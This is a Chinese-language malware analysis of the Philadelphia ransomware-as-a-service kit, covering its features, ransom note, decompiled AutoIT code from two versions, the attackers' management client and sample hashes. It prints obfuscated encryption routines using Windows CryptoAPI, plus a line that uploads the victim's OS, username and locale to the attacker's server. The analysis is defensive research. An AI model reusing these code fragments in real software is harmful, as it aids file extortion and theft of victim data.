最具同情心的勒索軟件套件Philadelphia。最近，一種新型的勒索軟件服務(wù)(RaaS)名為Philadelphia，開始向外以400美元的價(jià)格售賣，這個(gè)惡意軟件作者的名為Rainmaker。據(jù)Rainmaker所說(shuō)，該程序套件提供一種低成本的勒索軟件服務(wù)，它允許任何一個(gè)有犯罪意圖的人發(fā)動(dòng)高級(jí)的勒索軟件攻擊，并且它操作簡(jiǎn)單，成本低。

同時(shí)，據(jù)Rainmaker介紹，Philadelphia“創(chuàng)新”勒索軟件服務(wù)市場(chǎng)，它具有自動(dòng)檢測(cè)功能：當(dāng)付款已經(jīng)完成，然后自動(dòng)解密;感染USB驅(qū)動(dòng)器，并通過(guò)網(wǎng)絡(luò)感染其他計(jì)算機(jī)。 特別值得注意的是，“同情按鈕”將提供給賦有同情心的犯罪分子解密特定受害者的文件。 為了演示這種新的勒索軟件服務(wù)，Rainmaker創(chuàng)建了一個(gè)顯示其功能的PDF和視頻。

感染癥狀

當(dāng)文件被加密后，文件名稱將被更改為.lock后綴的文件名。例如文件test.jpg可能會(huì)變成7B205C09B88C57ED8AB7C913263CCFBE296C8EA9938A.locked. 加密完成后會(huì)顯示下面的鎖屏圖像：

如上圖所示，受害者被要求支付0.3比特幣，并且勒索軟件聲稱加密文件的算法使用了AES-256和RSA-2048。最后勒索軟件作者將重要的事情說(shuō)了3遍——發(fā)送0.3比特幣到下面的地址!!!

樣本分析

通過(guò)進(jìn)一步觀察，該惡意軟件是由AutoIT腳本編寫并打包生成。通過(guò)反編譯該AutoIT惡意程序，我們發(fā)現(xiàn)了其中的兩個(gè)不同的版本。因此我們將分別分析它們。

V1.0

將自身拷貝到%appdata%\scvhost.exe，并且列出了待加密文件的類型：

添加開機(jī)自啟動(dòng)：

待加密的目錄：

加密 加密硬盤，可移動(dòng)硬盤，網(wǎng)絡(luò)映射：

經(jīng)過(guò)混淆的加密文件算法：

$48E2CB6EE27D6950 &= _48E2CBFBE08D6950 ( 0 , STRINGTRIMRIGHT ( $48E02B6BE07D6950 [ $48E02B6BE07D6950 [ 0 ] ] , STRINGLEN ( ".locked" ) ) , $48E21B4BE07D6950 )

IF _48E2CB6BE0E16950 ( $48E30B6BE07D6950 , $48E2CB6EE27D6950 , $48E21B4BE07D6950 , $48E2CB6BC77D6950 ) AND NOT @ERROR THEN

_48E2BB6BE0CD6950 ( $48E30B6BE07D6950 )

用于加密的 Windows 庫(kù)函數(shù)的初始化：

$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptCreateHash" , "handle" , _48E2CBDBE00D6950 ( ) , "uint" , $48E2CB63E07D6950 , "ptr" , 0 , "dword" , 0 , "handle*" , 0 )

$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptHashData" , "handle" , $48E2CB6B407D6950 , "struct*" , $48E2CB6BE02D6950 , "dword" , DLLSTRUCTGETSIZE ( $48E2CB6BE02D6950 ) , "dword" , $48E2CB6BE0ED6950 )

$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptDeriveKey" , "handle" , _48E2CBDBE00D6950 ( ) , "uint" , $48E2CB3BE07D6950 , "handle" , $48E2CB6B407D6950 , "dword" , $48E28B6BE07D6950 , "handle*" , 0 )

$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptEncrypt" , "handle" , $48E27B6BE07D6950 , "handle" , 0 , "bool" , $48E2CD6BE07D6950 , "dword" , 0 , "ptr" , 0 , "dword*" , BINARYLEN ( $48E2BB6BE07D6950 ) , "dword" , 0 )

經(jīng)過(guò)對(duì)上面混淆過(guò)后的代碼回溯跟蹤和分析，函數(shù) _48E2CB6BE0E16950() 用來(lái)加密文件， 變量$48E2CB6BC77D6950是加密文件函數(shù)的一個(gè)重要參數(shù)，繼續(xù)向上找發(fā)現(xiàn)該變量的初始化代碼：

GLOBAL CONST $48E2CB6BC77D6950 = 26128 //0x6610 CALG_AES_256

正如惡意軟件所描述的，采用了AES-256加密算法，但是我們沒有看到RSA加密算法。

生成隨機(jī)數(shù)作為密鑰：

V2.0

新的版本在大的功能方面和核心算法方面并沒有太大的變化，故不作重復(fù)列舉，以下只列出與舊版本不同的部分。

通過(guò)反編譯我們發(fā)現(xiàn)，新版本的勒索軟件Philadelphia釋放了一個(gè)INI文件作為惡意軟件的配置文件。

互斥體名，UAC，C2， 提示信息：

待加密的目錄：

待加密的文件類型，釋放的文件名，文件路徑：

由此我們可以看出，新版本的惡意程序擺脫了”硬編碼”，通過(guò)設(shè)置配置文件來(lái)根據(jù)需要更改加密的具體細(xì)節(jié)。除此之外，我們?cè)谛掳姹局羞�發(fā)現(xiàn)一個(gè)有趣的地方：

處于好奇，我們Google此人”Fabian” ，我們發(fā)現(xiàn)此人很可能是 Fabian Wosar， 此人正是 Emsisoft 的反病毒研究員，繼續(xù)搜索我們發(fā)現(xiàn)，此前Emsisoft 宣布可以解密勒索軟件Philadelphia。 但是從代碼分析來(lái)看，新的版本加密文件的算法依然是AES-256，由此我們得出此勒索軟件加密后的文件依舊可以解密而不需要交贖金。由此再來(lái)看這段代碼，讓人啼笑皆非。

最后，惡意程序?qū)⑸蟼魇芨腥菊哂?jì)算機(jī)的相關(guān)信息到攻擊者的服務(wù)器：

$C1 = _HL ( STRING ( $BU & "?p=Insert&osinfo=" & _HI ( @OSVERSION ) & "&user=" & _HI ( @USERNAME ) & "&country=" & _HI ( $BX ) & "&locale=" & _HI ( $BY ) & "&ucd=" & _HI ( $BZ ) ) )

勒索軟件管理客戶端

對(duì)于發(fā)動(dòng)Philadelphia勒索軟件的攻擊者，他們需要在網(wǎng)站上安裝一個(gè)名為”網(wǎng)橋”的PHP腳本。 這些”網(wǎng)橋”將與勒索軟件感染者連接，并存儲(chǔ)有關(guān)受害者的加密密鑰等信息。然后，攻擊者在其計(jì)算機(jī)上運(yùn)行名為Philadelphia總部的管理客戶端，該管理客戶端將連接到每個(gè)配置的”網(wǎng)橋”，并將受害者數(shù)據(jù)下載到其管理控制臺(tái)。 這個(gè)客戶端允許攻擊者看到誰(shuí)被感染，哪些國(guó)家感染最多，甚至如果有同情心的攻擊者想允許某人免費(fèi)解密他們的文件，甚至提供憐憫的按鈕。如圖：

Sha1:

9f906472665f6447dd24da499d6e0f7ebe119c82

63e74c51b8e8a2f4e5b7f4c43fd7b3e816e1b367

總結(jié)

手動(dòng)分析這種基于AutoIT勒索程序樣本的難度并不大，但是通過(guò)強(qiáng)的代碼混淆技術(shù)，反調(diào)試，反模擬器等技術(shù)的運(yùn)用，的確給殺毒軟件的識(shí)別和查殺帶來(lái)了難度。同時(shí)，勒索軟件出售服務(wù)的出現(xiàn)，加大了網(wǎng)絡(luò)攻擊的可能性，并降低了非專業(yè)技術(shù)人員實(shí)施網(wǎng)絡(luò)攻擊的難度，這值得我們警惕。